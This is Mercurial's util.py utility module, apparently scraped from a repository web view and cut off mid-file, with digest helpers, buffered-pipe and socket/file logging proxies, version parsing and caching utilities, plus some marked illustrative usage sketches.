py3: cast attribute name to sysstr in clearcachedproperty()
Yuya Nishihara
r40725:475921a3 default
# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial utility functions and platform specific implementations.

This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
"""

from __future__ import absolute_import, print_function

import abc
import bz2
import collections
import contextlib
import errno
import gc
import hashlib
import itertools
import mmap
import os
import platform as pyplatform
import re as remod
import shutil
import socket
import stat
import sys
import time
import traceback
import warnings
import zlib

from .thirdparty import (
    attr,
)
from hgdemandimport import tracing
from . import (
    encoding,
    error,
    i18n,
    node as nodemod,
    policy,
    pycompat,
    urllibcompat,
)
from .utils import (
    procutil,
    stringutil,
)

base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

cookielib = pycompat.cookielib
httplib = pycompat.httplib
pickle = pycompat.pickle
safehasattr = pycompat.safehasattr
socketserver = pycompat.socketserver
bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr

if pycompat.iswindows:
    from . import windows as platform
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
expandglobs = platform.expandglobs
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
groupmembers = platform.groupmembers
groupname = platform.groupname
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
posixfile = platform.posixfile
readlink = platform.readlink
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setflags = platform.setflags
split = platform.split
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
umask = platform.umask
unlink = platform.unlink
username = platform.username

try:
    recvfds = osutil.recvfds
except AttributeError:
    pass

# Python compatibility

_notset = object()

def bitsfrom(container):
    bits = 0
    for bit in container:
        bits |= bit
    return bits

# Python 2.6 still has deprecation warnings enabled by default. We do not
# want to display anything to standard users, so detect if we are running a
# test and only use Python deprecation warnings in that case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
    warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                            DeprecationWarning, r'mercurial')
    # TODO: reinvent imp.is_frozen()
    warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
                            DeprecationWarning, r'mercurial')

def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a Python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if _dowarn:
        msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                " update your code.)") % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)

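# Usage sketch (illustrative, not part of upstream util.py): how extension
# code might flag a deprecated helper. The helper name is hypothetical, and
# the warning only fires when HGEMITWARNINGS is set (i.e. under the test
# runner), since nouideprecwarn() is a no-op otherwise.
def _deprecatedhelperexample():
    nouideprecwarn(b'_deprecatedhelperexample is deprecated', b'4.9')
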
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            raise error.Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None

class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        if self._size != self._got:
            raise error.Abort(_('size mismatch: expected %d, got %d') %
                              (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise error.Abort(_('%s mismatch: expected %s, got %s') %
                                  (k, v, self._digester[k]))

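# Usage sketch (illustrative, not part of upstream util.py): wrap an
# in-memory stream and validate it against a known size and md5 value
# (the digest of b'foo', taken from the digester doctest above).
def _digestcheckerexample():
    import io
    fh = io.BytesIO(b'foo')
    wrapped = digestchecker(fh, 3,
                            {b'md5': b'acbd18db4cc2f85cedef654fccc4a4d8'})
    wrapped.read()      # all reads must go through the wrapper
    wrapped.validate()  # raises error.Abort on size or digest mismatch
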
try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]

_chunksize = 4096

class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []
        self._eof = False
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True if any data is currently buffered

        This will be used externally as a pre-step for polling IO. If there
        is already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def unbufferedread(self, size):
        if not self._eof and self._lenbuf == 0:
            self._fillbuffer(max(size, _chunksize))
        return self._frombuffer(min(self._lenbuf, size))

    def readline(self, *args, **kwargs):
        if len(self._buffer) > 1:
            # this should not happen because both read and readline end with
            # a _frombuffer call that collapses it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif len(self._buffer) > 1:
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if len(self._buffer) > 1:
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self, size=_chunksize):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), size)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data

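# Usage sketch (illustrative, not part of upstream util.py): reading from a
# child process while keeping select()-style polling meaningful. 'cmd' is a
# hypothetical argument list for subprocess.Popen.
def _bufferedinputpipeexample(cmd):
    import subprocess
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)
    pipe = bufferedinputpipe(proc.stdout)
    # Only poll the fd when our own buffer is empty; already-buffered data
    # would never be reported by select/poll.
    if not pipe.hasbuffer:
        poll([pipe.fileno()])
    return pipe.readline()
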
def mmapread(fp):
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise

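# Usage sketch (illustrative, not part of upstream util.py): mmapread()
# accepts either a file object or a raw file descriptor, and transparently
# handles the empty-file case that plain mmap.mmap() rejects.
def _mmapreadexample(path):
    with open(path, 'rb') as fp:
        data = mmapread(fp)
        return len(data)
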
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed if a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)

class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res

PROXIED_SOCKET_METHODS = {
    r'makefile',
    r'recv',
    r'recvfrom',
    r'recvfrom_into',
    r'recv_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'settimeout',
    r'gettimeout',
    r'setsockopt',
}

class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, sock, observer):
        object.__setattr__(self, r'_orig', sock)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, r'_observedcall')(
            r'makefile', *args, **kwargs)

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, r'_observer')
        return makeloggingfileobject(observer.fh, res, observer.name,
                                     reads=observer.reads,
                                     writes=observer.writes,
                                     logdata=observer.logdata,
                                     logdataapis=observer.logdataapis)

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv', *args, **kwargs)

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom', *args, **kwargs)

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom_into', *args, **kwargs)

    def recv_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv_into', *args, **kwargs)

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'send', *args, **kwargs)

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendall', *args, **kwargs)

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendto', *args, **kwargs)

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setblocking', *args, **kwargs)

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'settimeout', *args, **kwargs)

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'gettimeout', *args, **kwargs)

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setsockopt', *args, **kwargs)

class baseproxyobserver(object):
    def _writedata(self, data):
        if not self.logdata:
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(': %s\n' % stringutil.escapestr(data))
            else:
                self.fh.write('%s> %s\n'
                              % (self.name, stringutil.escapestr(data)))
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(':\n')

        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n'
                          % (self.name, stringutil.escapestr(line)))
        self.fh.flush()

class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if size == -1 and res == '':
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)

def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object."""

    observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
                                  logdata=logdata, logdataapis=logdataapis)
    return fileobjectproxy(fh, observer)

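# Usage sketch (illustrative, not part of upstream util.py): observe every
# read on a file object, mirroring activity to a byte-oriented log handle
# (stderr's buffer on Python 3, stderr itself on Python 2).
def _loggingfileobjectexample(path):
    import sys
    logh = getattr(sys.stderr, 'buffer', sys.stderr)
    fh = open(path, 'rb')
    proxy = makeloggingfileobject(logh, fh, b'example', writes=False)
    proxy.read(10)  # logs "example> read(10) -> ..." plus the data read
    proxy.close()
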
class socketobserver(baseproxyobserver):
    """Logs socket activity."""
    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.states = states
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        # send() returns the number of bytes written, not the data itself.
        self.fh.write('%s> send(%d, %d) -> %d' % (
            self.name, len(data), flags, res))
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))

def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket."""

    observer = socketobserver(logh, name, reads=reads, writes=writes,
                              states=states, logdata=logdata,
                              logdataapis=logdataapis)
    return socketproxy(fh, observer)

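# Usage sketch (illustrative, not part of upstream util.py): trace socket
# traffic during a simple exchange. The host and port are hypothetical.
def _loggingsocketexample(host, port):
    import sys
    logh = getattr(sys.stderr, 'buffer', sys.stderr)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    logged = makeloggingsocket(logh, s, b'conn')
    logged.connect((host, port))  # unproxied calls pass straight through
    logged.send(b'ping')          # logged as "conn> send(4, 0) -> 4"
    logged.close()
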
969 def version():
969 def version():
970 """Return version information if available."""
970 """Return version information if available."""
971 try:
971 try:
972 from . import __version__
972 from . import __version__
973 return __version__.version
973 return __version__.version
974 except ImportError:
974 except ImportError:
975 return 'unknown'
975 return 'unknown'
976
976
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'4.6rc0+12-425d55e54f98')
    (4, 6, None, 'rc0+12-425d55e54f98')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()
    m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
    if not m:
        vparts, extra = '', v
    elif m.group(2):
        vparts, extra = m.groups()
    else:
        vparts, extra = m.group(1), None

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)

def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keyword args
    if func.__code__.co_argcount == 0:
        cache = []
        def f():
            if len(cache) == 0:
                cache.append(func())
            return cache[0]
        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f

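# An illustrative sketch of cachefunc (editor's addition; ``square`` is a
# hypothetical pure function of one hashable positional argument):
#
#   >>> calls = []
#   >>> def square(x):
#   ...     calls.append(x)
#   ...     return x * x
#   >>> csquare = cachefunc(square)
#   >>> csquare(3), csquare(3), calls   # second call served from the cache
#   (9, 9, [3])
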
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self

class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v

class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """

class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """

class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

